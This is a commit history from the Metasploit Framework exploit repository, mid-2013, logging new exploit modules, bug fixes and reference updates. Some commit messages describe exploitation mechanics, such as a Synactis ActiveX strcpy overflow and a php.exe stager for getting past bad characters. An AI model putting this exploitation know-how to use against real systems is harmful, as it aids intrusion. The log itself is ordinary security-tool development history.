Commit Graph

5293 Commits (5ff25d8b96d5b3497b65a7092be9bb6bb7ea871c)

Author SHA1 Message Date
sinn3r 7ef5695867 [FixRM:#8129] - Remove invalid metasploit.com references
These "metasploit.com" references aren't related to the vulns,
shouldn't be in them.
2013-07-03 11:52:10 -05:00
jvazquez-r7 c07e65d16e Improve and clean instantcms_exec 2013-07-03 11:37:57 -05:00
g0tmi1k 2a6056fd2a exploits/s4u_persistence~Fixed typos+default values 2013-07-03 00:38:50 +01:00
Ricardo Almeida dd876008f9 Update instantcms_exec.rb 2013-07-02 17:26:14 +01:00
jvazquez-r7 146d1eb27d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-02 10:06:00 -05:00
jvazquez-r7 1110aefe49 Land #2038, @modpr0be exploit for ABBS Audio Media Player 2013-07-01 23:20:50 -05:00
modpr0be 2e5398470b remove additional junk, tested and not needed 2013-07-02 09:23:42 +07:00
jvazquez-r7 72f19181d1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-01 16:38:19 -05:00
Ricardo Almeida dafa333e57 Update instantcms_exec.rb 2013-07-01 22:03:37 +01:00
Tod Beardsley bc24f99f8d Various description and title updates 2013-07-01 15:37:37 -05:00
modpr0be 9b8bfa6290 change last junk from rand_text_alpha_upper to rand_text 2013-07-01 23:49:19 +07:00
modpr0be c631778a38 make a nice way to fill the rest of buffer 2013-07-01 23:39:08 +07:00
Ricardo Almeida 760133d878 Error on line 60 2013-07-01 12:04:03 -04:00
sinn3r dbce1b36e5 Land #2036 - CVE-2013-3660
Thx Tavis, Keebie4e, and Meatballs
2013-07-01 10:55:51 -05:00
Ricardo Almeida 4cd08966ff added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
modpr0be 478beee38b remove unnecessary option and make msftidy happy 2013-07-01 18:51:47 +07:00
modpr0be f16d097c00 clean version, tested on winxp sp3 and win7 sp1 2013-07-01 18:35:50 +07:00
jvazquez-r7 f58f481399 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-30 22:36:46 -05:00
modpr0be e0ae71e874 minor fixing in the exploit module description 2013-07-01 03:27:06 +07:00
modpr0be 007fddb6bf remove SEH function, not needed 2013-07-01 03:13:20 +07:00
modpr0be 1e4b69ab03 Added abbs amp exploit module 2013-07-01 03:08:22 +07:00
jvazquez-r7 0ff1cd24a9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-30 10:03:30 -05:00
jvazquez-r7 867eed7957 Make msftidy happy 2013-06-30 10:01:40 -05:00
jvazquez-r7 db00599d44 Move carberp_backdoor_exec to unix webapp exploits folder 2013-06-30 10:00:14 -05:00
Brian Wallace d990c7f21f Dat line 2013-06-29 09:46:36 -07:00
Brian Wallace ec7c9b039a Further refactoring requested 2013-06-29 09:45:22 -07:00
jvazquez-r7 a2b8daf149 Modify fail message when exploitation doesn't succeed 2013-06-29 10:45:13 -05:00
jvazquez-r7 a5c3f4ca9b Modify ruby code according to comments 2013-06-29 08:54:00 -05:00
Brian Wallace 8542342ff6 Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec 2013-06-28 22:45:03 -07:00
Brian Wallace b8cada9ab0 Applied some refactoring to decrease line count 2013-06-28 22:44:23 -07:00
jvazquez-r7 427e26c4dc Fix current_pid 2013-06-28 21:36:49 -05:00
jvazquez-r7 32ae7ec2fa Fix error description and bad variable usage 2013-06-28 21:30:33 -05:00
jvazquez-r7 fb67002df9 Switch from print_error to print_warning 2013-06-28 21:29:20 -05:00
jvazquez-r7 3ab948209b Fix module according to @wchen-r7 feedback 2013-06-28 20:44:42 -05:00
jvazquez-r7 00416f3430 Add a new print_status 2013-06-28 18:23:49 -05:00
jvazquez-r7 7725937461 Add Module for cve-2013-3660 2013-06-28 18:18:21 -05:00
(B)rian (Wall)ace 9486364cc4 Added Steven K's email 2013-06-28 15:31:17 -07:00
Brian Wallace fe0e16183c Carberp backdoor eval PoC 2013-06-28 14:47:13 -07:00
jvazquez-r7 3c1af8217b Land #2011, @matthiaskaiser's exploit for cve-2013-2460 2013-06-26 14:35:22 -05:00
jvazquez-r7 81a2d9d1d5 Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework 2013-06-26 14:32:59 -05:00
jvazquez-r7 90b30dc317 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-26 14:31:52 -05:00
William Vu e4fb5b327f Land #2028, update references for multiple modules 2013-06-26 10:18:27 -05:00
Steve Tornio 6ea622c45e reference updates 2013-06-26 09:44:56 -05:00
jvazquez-r7 7ab4d4dcc4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 17:34:29 -05:00
James Lee 3e929fb812 Use fixed `write_file` instead of re-implementing 2013-06-25 17:25:14 -05:00
Steve Tornio 5b71013dde reference updates 2013-06-25 13:41:22 -05:00
jvazquez-r7 4fa789791d Explain Ranking 2013-06-25 13:10:15 -05:00
jvazquez-r7 127300c62d Fix also ruby module 2013-06-25 12:59:42 -05:00
jvazquez-r7 1ade467ac9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 11:10:43 -05:00
jvazquez-r7 b32513b1b8 Fix CVE-2013-2171 with @jlee-r7 feedback 2013-06-25 10:40:55 -05:00
jvazquez-r7 3244013b1f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 09:48:20 -05:00
jvazquez-r7 c9a7372f9f Land #2014, @wchen-r7's exploit for CVE-2013-2171 2013-06-25 09:33:56 -05:00
jvazquez-r7 0c306260be Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 09:13:01 -05:00
William Vu d6374ddfff Land #2020, CVE and OSVDB update 2013-06-25 08:17:54 -05:00
sinn3r 4df943d1a2 CVE and OSVDB update 2013-06-25 02:06:20 -05:00
jvazquez-r7 795dd6a02a Add module for OSVDB 93718 2013-06-24 23:51:28 -05:00
jvazquez-r7 e9fccb8dbd Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-24 22:07:48 -05:00
sinn3r 72847ee4c9 Land #2007 - Add local privilege escalation for ZPanel zsudo 2013-06-24 19:25:27 -05:00
jvazquez-r7 ca8ce363b8 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-24 16:32:55 -05:00
sinn3r d974e395e4 Add a check by checking uname 2013-06-24 15:54:41 -05:00
sinn3r 6b8e0605c0 Use FileDropper 2013-06-24 15:48:54 -05:00
HD Moore 24b7d19ecc Fix target regex and wfsdelay 2013-06-24 14:56:43 -05:00
jvazquez-r7 b86b4d955a Make random strings also length random 2013-06-24 12:01:30 -05:00
jvazquez-r7 98fddb6ce1 up to date 2013-06-24 11:57:11 -05:00
sinn3r 6780566a54 Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation Module 2013-06-24 11:50:21 -05:00
jvazquez-r7 f7650a4b18 Fix wrong local variable 2013-06-24 11:35:26 -05:00
sinn3r b3d90c68a4 Land #2008 - More OSVDB refs 2013-06-24 01:53:29 -05:00
Matthias Kaiser 8a96b7f9f2 added Java7u21 RCE module
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7 31fcb911f2 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-23 21:41:10 -05:00
Steve Tornio a920127f8c reference updates for several modules 2013-06-23 20:43:34 -05:00
sinn3r 5b0092ff39 Land #2006 - Ref updates 2013-06-23 18:26:48 -05:00
jvazquez-r7 6672679530 Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 11:00:39 -05:00
jvazquez-r7 b49c4c4e9e up to date 2013-06-22 18:28:17 -05:00
jvazquez-r7 345773592f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-22 13:54:47 -05:00
jvazquez-r7 04e6167f90 zpanel 2013-06-22 13:54:22 -05:00
jvazquez-r7 e9883fe5b9 Land #2005, @wchen-r7's exploit for ZPanel htpasswd 2013-06-22 13:24:23 -05:00
jvazquez-r7 2150d9efb0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-22 12:06:18 -05:00
Steve Tornio 427f063c48 fix formatting 2013-06-22 07:32:29 -05:00
Steve Tornio 1e25dedb66 fix formatting 2013-06-22 07:31:47 -05:00
Steve Tornio 14850cd387 reference updates for multiple modules 2013-06-22 07:28:04 -05:00
sinn3r de659326ce Land #2003 - Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation 2013-06-21 21:52:32 -05:00
sinn3r 5de7fff685 Credit 2013-06-21 21:38:40 -05:00
sinn3r 339f2a5c83 Hmmm, one extra ',' 2013-06-21 21:29:17 -05:00
sinn3r 8d422c9a39 Forgot to randomize the fake pass and remove the payload during testing 2013-06-21 21:27:11 -05:00
sinn3r e7d75d6d16 Add OSVDB-94038: ZPanel htpasswd Module Username Command Execution 2013-06-21 21:03:10 -05:00
Markus Wulftange afa0e6c42a Use CmdStagerVBS instead of CmdStagerTFTP
By using `php.exe` as stager, the bad characters can be completely
bypassed. This allows the use of the CmdStagerVBS, which should be
working on all supported Windows systems.
2013-06-22 01:13:03 +02:00
jvazquez-r7 f106b6db50 Add comment with the component version 2013-06-21 17:38:30 -05:00
jvazquez-r7 5fe9a80bf0 Add module for OSVDB 46578 2013-06-21 17:31:40 -05:00
James Lee 2c12a43e77 Add a method for dealing with hardcoded URIs 2013-06-21 15:48:02 -05:00
jvazquez-r7 785639148c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-20 17:18:42 -05:00
William Vu 4cc1f2440d Land #1996, references for several modules 2013-06-20 11:32:55 -05:00
Steve Tornio 322ba27f0f re-order refs 2013-06-20 11:17:23 -05:00
William Vu 22026352e6 Land #1995, OSVDB reference for Gitorious 2013-06-20 10:51:51 -05:00
William Vu e4cbd4b174 Land #1994, OSVDB reference for JBoss 2013-06-20 10:51:28 -05:00
Steve Tornio 66f4424202 fix formatting 2013-06-20 10:41:14 -05:00
Steve Tornio a3a5dec369 add osvdb ref 94441 2013-06-20 08:03:34 -05:00
Steve Tornio abea7e6a47 add osvdb ref 76389 2013-06-20 07:55:50 -05:00
Steve Tornio cab20062a4 add osvdb ref 84706 2013-06-20 07:38:34 -05:00
Steve Tornio a824a0583e add osvdb ref 89059 2013-06-20 07:34:15 -05:00
Steve Tornio 89f649ab99 add osvdb ref 89026 2013-06-20 07:28:29 -05:00
Steve Tornio 2b55e0e0a6 add osvdb ref 64171 2013-06-20 07:17:22 -05:00
Steve Tornio d19bd7a905 add osvdb 85739, cve 2012-5159, edb 21834 2013-06-20 07:01:59 -05:00
Steve Tornio 6cc7d9ccae add osvdb ref 85446 and edb ref 20500 2013-06-20 06:54:06 -05:00
Steve Tornio ee21120c04 add osvdb ref 85509 2013-06-20 06:47:10 -05:00
Steve Tornio ade970afb8 add osvdb ref 89322 2013-06-20 06:44:22 -05:00
Steve Tornio 42690a5c48 add osvdb ref 77492 2013-06-20 06:38:47 -05:00
Steve Tornio 0dca5ede7e add osvdb ref 78480 2013-06-20 06:07:08 -05:00
Steve Tornio 29bc169507 add osvdb ref 64171 2013-06-20 06:00:05 -05:00
sinn3r 8dfe9b5318 Add login feature 2013-06-20 04:16:23 -05:00
sinn3r ebde05b783 Improve check 2013-06-20 03:18:33 -05:00
sinn3r 20621d17de Add CVE-2013-3576 - HP System Management Homepage exploit 2013-06-20 03:08:42 -05:00
jvazquez-r7 fc7670fa5f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 23:16:04 -05:00
jvazquez-r7 494ee160af Fix indent 2013-06-19 23:12:12 -05:00
jvazquez-r7 2d99c46414 Land #1990, @wchen-r7's exploit for Libretto CMS 2013-06-19 23:11:34 -05:00
sinn3r 079477c57d Commit final version 2013-06-19 20:35:24 -05:00
jvazquez-r7 869438cb73 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 19:57:40 -05:00
sinn3r 62b23bc594 Initial (incomplete) commit 2013-06-19 16:59:15 -05:00
James Lee 81b4efcdb8 Fix requires for PhpEXE
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7 6d1101b65b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 12:14:53 -05:00
sinn3r d347be35e9 Land #1986 - Restores MoinMoin during exploitation 2013-06-19 12:14:10 -05:00
jvazquez-r7 a894dc83c2 Try restore also at exploiting time 2013-06-19 11:35:52 -05:00
sinn3r 7b0977f897 Change base path 2013-06-19 11:33:45 -05:00
sinn3r f0c81ed3cc Correct disclosure date 2013-06-19 03:00:32 -05:00
sinn3r 67593d6ef4 Eh, PHP, not "php" 2013-06-19 02:34:49 -05:00
sinn3r 9c3bd12613 If I can't write, I want to know.
It's possible that the upload directory doesn't allow write, the
module should be aware of that.  Other reasons may be possible.
2013-06-19 02:32:30 -05:00
sinn3r 19d868748d Final version 2013-06-19 02:21:01 -05:00
sinn3r 5c1822ea17 Initial commit for havalite module 2013-06-18 19:00:42 -05:00
jvazquez-r7 fd397db6e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 14:09:33 -05:00
sinn3r b514124997 Land #1979 - OSVDB update 2013-06-18 10:42:09 -05:00
sinn3r fbd16a2f3e Land #1978 - OSVDB update 2013-06-18 10:41:33 -05:00
sinn3r 1e46f7df48 Land #1977 - OSVDB update 2013-06-18 10:40:55 -05:00
sinn3r d0ed9a6687 Land #1976 - OSVDB update 2013-06-18 10:40:00 -05:00
jvazquez-r7 9e3053f24d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 10:00:44 -05:00
jvazquez-r7 aa134b0bcc Land #1973, @wchen-r7's fix to handle ftp auth correctly 2013-06-18 09:34:55 -05:00
jvazquez-r7 2b46828d9c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 08:27:18 -05:00
Steve Tornio e278ac5061 add osvdb ref 91841 2013-06-18 06:41:30 -05:00
Steve Tornio 404a9f0669 add osvdb ref 89594 2013-06-18 06:25:57 -05:00
Steve Tornio 27158d89c7 add osvdb ref 89105 2013-06-18 06:15:29 -05:00
Steve Tornio 2afc90a8de fix typos 2013-06-18 06:05:45 -05:00
Steve Tornio 2c3181b56b add osvdb ref 90627 2013-06-18 05:59:39 -05:00
sinn3r 070111a520 Land #1975 - Add CVE-2012-6081 (MoinMoin twikidraw Action Traversal) 2013-06-17 22:31:36 -05:00
sinn3r 3223ea799c An invalid WritablePage option can result in the same message as well. 2013-06-17 22:30:44 -05:00
jvazquez-r7 ae1a3e3ca1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 20:39:31 -05:00
jvazquez-r7 044bd2101f Authenticate against the page to modify 2013-06-17 20:34:02 -05:00
Tod Beardsley 4ca9a88324 Tidying up grammar and titles 2013-06-17 16:49:14 -05:00
jvazquez-r7 de1561363e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 16:43:33 -05:00
jvazquez-r7 0bd6ca2a6a Add module for CVE-2012-6081 2013-06-17 16:13:55 -05:00
sinn3r 820f589df0 Missed this one. 2013-06-17 15:52:53 -05:00
sinn3r 163d3e771b Handle connect_login return value properly
Some modules ignore connect_login's return value, which may result
in an EOF if send_cmd() is used later on.  All the modules fixed are
the ones that require auth according to the module description, or
CVE/vendor/OSVDB info.
2013-06-17 15:48:34 -05:00
William Vu b51349ed77 Land #1968, OSVDB reference for ManageEngine 2013-06-17 10:30:05 -05:00
jvazquez-r7 8fac0aaf6b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 08:24:39 -05:00
Steve Tornio e37a0b871f add osvdb ref 86562 2013-06-17 06:04:54 -05:00
Steve Tornio 6e57ecab59 add osvdb ref 79246 and edb ref 18492 2013-06-17 05:58:00 -05:00
Steve Tornio e17ccdda3a add osvdb ref 68662 2013-06-16 18:11:13 -05:00
jvazquez-r7 11bf17b0d6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-15 11:55:22 -05:00
William Vu 0cf2751ec1 Land #1965, OSVDB reference for pBot 2013-06-15 07:39:25 -05:00
Steve Tornio d35dd73328 add osvdb ref 84913 2013-06-15 07:30:23 -05:00
William Vu 638175a6be Land #1964, OSVDB reference for StorageWorks 2013-06-15 07:27:43 -05:00
Steve Tornio 0c6157694f add osvdb ref 82087 2013-06-15 07:22:32 -05:00
Steve Tornio 6e8b844954 add osvdb ref 89611 2013-06-15 07:12:44 -05:00
Steve Tornio 63483a979d add osvdb ref 89611 2013-06-15 07:09:26 -05:00
William Vu bd17e67f75 Land #1960, lower ranking for MS13-009 2013-06-14 15:28:06 -05:00
sinn3r 2abf70a1ca Lower ranking for MS13-009
We haven't been able to make this one more reliable, so todb suggests
we lower the ranking first.
2013-06-14 15:24:43 -05:00
sinn3r d35c3469e8 Fix typo
EDB reference
2013-06-14 15:16:20 -05:00
jvazquez-r7 2d083be8e7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-14 13:28:44 -05:00
sinn3r 0d384d23b8 Land #1954 - Fix resource_uri and mp4 file path 2013-06-14 13:15:17 -05:00
jvazquez-r7 060261bb3b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-14 13:15:13 -05:00
sinn3r 933ac88b44 Missing the file param that's needed to download the mp4 2013-06-14 13:13:48 -05:00
sinn3r d2df3234f4 Land #1955 - mozilla_mchannel.rb undefined agent variable 2013-06-14 11:14:20 -05:00
sinn3r 223807d0df Land #1956 - fix regex error for mozilla_reduceright.rb 2013-06-14 11:09:49 -05:00
jvazquez-r7 86258e32b1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 16:05:03 -05:00
sinn3r 0440c03c7a Land #1934 - Fix UltraISO Exploit File Creation 2013-06-13 13:57:09 -05:00
jvazquez-r7 95118895d6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 13:05:42 -05:00
jvazquez-r7 81813a78fc Fix module Name 2013-06-13 11:55:23 -05:00
jvazquez-r7 707bc33148 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 10:17:28 -05:00
jvazquez-r7 eaba8e7b59 up to date 2013-06-12 15:44:00 -05:00
jvazquez-r7 afb2f83238 Add module for CVE-2012-1533 2013-06-12 14:40:53 -05:00
jvazquez-r7 0b9cf213df Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-12 12:03:10 -05:00
jvazquez-r7 c38eabe481 Fix description, code and perform test 2013-06-12 11:07:03 -05:00
jvazquez-r7 5c8053491f Add DEP bypass for ntdll ms12-001 2013-06-12 10:41:05 -05:00
jvazquez-r7 a1c7961cbc Support js obfuscation for the trigger 2013-06-12 08:06:12 -05:00
jvazquez-r7 5240c6e164 Add module for MS13-037 CVE-2013-2551 2013-06-12 07:37:57 -05:00
Joe Vennix 45da645717 Update ff svg exploit description to be more accurate. 2013-06-11 12:12:18 -05:00
jvazquez-r7 9ea58ba165 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-11 10:40:01 -05:00
sinn3r 081baad68c Remove variable 'overflow' because it's not used
The 'overflow' variable isn't needed
2013-06-11 02:26:45 -05:00
Ruslaideemin ca0ab8d6ee maxthon_history_xcs.rb - fix User-agent string
request.headers['User-agent'] is incorrect, it should be
request.headers['User-Agent'].

Downloaded following version from oldapps.com to confirm
the exploit code is wrong.

Supported Systems Windows 98, 2000 (Maxthon 2.5.15 Build
  1000), XP, Vista, 7, 8
MD5 Checksum F3791637C886A46940876211209F82F4
SHA1 Checksum 039BB218245E5DC1BAB0F57298C68AC487F86323

Release Date 20 October, 2011 (2 years ago )
2013-06-11 13:37:21 +10:00
jvazquez-r7 69c25014ae Make msftidy happy 2013-06-13 18:58:38 -05:00
sinn3r 12801430e3 Update both ultraiso files to the right fix 2013-06-13 18:44:19 -05:00
Ruslaideemin 4e41e871bb mozilla_reduceright.rb - fix regex error.
[] is character class, and will match on 1, 6, 7, and |.
Whereas (16|17) will match on either 16, or 17.

irb(main):053:0> y = /Firefox\/3\.6\.[16|17]/
=> /Firefox\/3\.6\.[16|17]/
irb(main):054:0> x = "Firefox/3.6.13"
=> "Firefox/3.6.13"
irb(main):055:0> x =~ y
=> 0
irb(main):056:0> y = /Firefox\/3\.6\.(16|17)/
=> /Firefox\/3\.6\.(16|17)/
irb(main):057:0> x =~ y
=> nil
2013-06-11 11:52:27 +10:00
Ruslaideemin 996171b35f mozilla_mchannel.rb undefined agent variable
If the TARGET is chosen instead of using the default
automatic, the agent variable will be undefined, which
causes the exploit to fail.
2013-06-11 10:43:47 +10:00
jvazquez-r7 72b871d762 up to date 2013-06-10 16:37:05 -05:00
Ruslaideemin d91b412661 adobe_flash_sps.rb - resource_uri vs get_resource
resource_uri will randomize the returned uri unless
datastore['URIPATH'] is set.

get_resource will return the currently used resource_uri

Since the incorrect type is used, this exploit is completely broken.

Tested fix with both URIPATH set to / and unset, and it works after
redirect.
2013-06-11 07:13:02 +10:00
jvazquez-r7 9c44ea0c61 up to date 2013-06-10 13:02:01 -05:00
jvazquez-r7 b20a38add4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-10 12:22:52 -05:00
sinn3r 0895184e1f Land #1932 - Actually support OUTPUTPATH datastore option 2013-06-10 11:22:28 -05:00
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 cae5e871e7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-08 23:24:39 -05:00
Ruslaideemin cd64e3593c Fix UltraISO file creation
This makes file creation where datastore['FILENAME'] is not used when
a different filename is required, and ends up creating files in the
wrong place.
2013-06-09 12:37:34 +10:00
Ruslaideemin c6b4290fea Fix UltraISO Exploit File Creation
Both ultraiso_ccd.rb and ultraiso_cue.rb use File.open to create
files, instead of using the create_file() function. This leads
to files being created in the wrong directory.

We work around this by dynamically changing the
file_format_filename function to return the corrected filename.
2013-06-09 09:51:15 +10:00
Ruslaideemin cb79aa252a Fix output path in ms10_004_textbytesatom.rb
ms10_004_textbytesatom.rb does not write to the local data directory,
instead it writes to the metasploit path (at least, that's where I
started msfrpcd).

This fixes it by using Msf::Config.local_directory
2013-06-09 07:28:48 +10:00
sinn3r f55edac0ca Title and description update 2013-06-07 22:38:53 -05:00
sinn3r a510084f1c Description change. 2013-06-07 22:35:46 -05:00
jvazquez-r7 600494817d Fix typo and target name 2013-06-07 21:08:38 -05:00
jvazquez-r7 9025b52951 make the payload build more clear 2013-06-07 18:05:11 -05:00
jvazquez-r7 d76e14fc9c Add module for OSVDB 93004 - Exim Dovecot exec 2013-06-07 17:59:04 -05:00
jvazquez-r7 9d0047ff74 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 16:44:52 -05:00
sinn3r aefcc51704 Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488) 2013-06-07 15:12:09 -05:00
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
jvazquez-r7 9c27a294cb Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 13:01:37 -05:00
jvazquez-r7 a157e65802 Land #1916, @wchen-r7's exploit for Synactics PDF 2013-06-07 12:11:45 -05:00
sinn3r ea2895ac13 Change to AverageRanking
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
2013-06-07 12:08:51 -05:00
sinn3r 9c7b446532 Updates description about default browser setting 2013-06-07 11:58:31 -05:00
sinn3r f3421f2c3a Fix different landings 2013-06-07 10:26:04 -05:00
jvazquez-r7 0fb77cb4a7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 08:44:07 -05:00
sinn3r da4b18c6a1 [FixRM:#8012] - Fix message data type to int
This patch makes sure s.message is actually an int, that way we can
properly stop or enable the service.
2013-06-06 23:49:14 -05:00
sinn3r e559824dc8 Remove whitespace 2013-06-06 20:08:50 -05:00
sinn3r d3e57ffc46 Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx.  When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
2013-06-06 20:05:08 -05:00
jvazquez-r7 ea2b7e623d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-06 08:21:39 -05:00
Steve Tornio 4d26299de3 add osvdb ref 93881 and edb ref 21191 2013-06-05 18:57:33 -05:00
jvazquez-r7 e5a17ba227 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-05 09:41:23 -05:00
sinn3r 6d3dcf0cef Land #1912 - Fixed check for Admins SID in whoami /group output 2013-06-05 02:55:38 -05:00
sinn3r a3b25fd7c9 Land #1909 - Novell Zenworks Mobile Device Management exploit & auxiliary 2013-06-05 02:45:45 -05:00
sinn3r 0c1d46c465 Add more references 2013-06-05 02:43:43 -05:00
sinn3r 46aa6d38f8 Add a check for it 2013-06-05 02:41:03 -05:00
sinn3r a270d37306 Take apart the version detection code 2013-06-05 02:34:35 -05:00
sinn3r 25fe03b981 People like this format better: IP:PORT - Message 2013-06-05 02:26:18 -05:00
sinn3r 02e29fff66 Make msftidy happy 2013-06-05 02:25:08 -05:00
sinn3r 35459f2657 Small name change, don't mind me 2013-06-05 02:18:11 -05:00
sinn3r 227fa4d779 Homie needs a default target 2013-06-05 02:16:59 -05:00
cbgabriel 1032663cd4 Fixed check for Administrators SID in whoami /group output 2013-06-04 18:34:06 -04:00
jvazquez-r7 b3a99affe0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 12:07:27 -05:00
steponequit ed4766dc46 initial commit of novell mdm modules 2013-06-04 09:20:10 -07:00
jvazquez-r7 3111013991 Minor cleanup for miniupnpd_soap_bof 2013-06-04 08:53:52 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
jvazquez-r7 86c768ad02 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 08:15:28 -05:00
Dejan Lukan 8ced3483de Deleted some unneeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb:100:in `call'
lib/msf/core/thread_manager.rb:100:in `block in spawn'

Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7 a5f9ed890b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 16:23:12 -05:00
jvazquez-r7 30a019e422 Land #1891, @wchen-r7's improve for ie_cgenericelement_uaf 2013-06-03 15:35:43 -05:00
jvazquez-r7 4079484968 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 15:27:36 -05:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
sinn3r c705928052 Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb 2013-06-03 10:40:31 -05:00
Steve Tornio 76faba60b7 add osvdb ref 85462 2013-06-03 06:16:43 -05:00
Steve Tornio e612a3d017 add osvdb ref 77183 2013-06-03 05:42:56 -05:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
sinn3r e74c1d957f Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb 2013-06-03 02:15:35 -05:00
sinn3r 093830d725 Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb 2013-06-03 02:13:34 -05:00
Steve Tornio c2c630c338 add osvdb ref 93444 2013-06-02 21:03:44 -05:00
Steve Tornio bc993b76fc add osvdb ref 82925 2013-06-02 20:43:16 -05:00
Steve Tornio ae17e9f7b5 add osvdb ref 56992 2013-06-02 18:32:46 -05:00
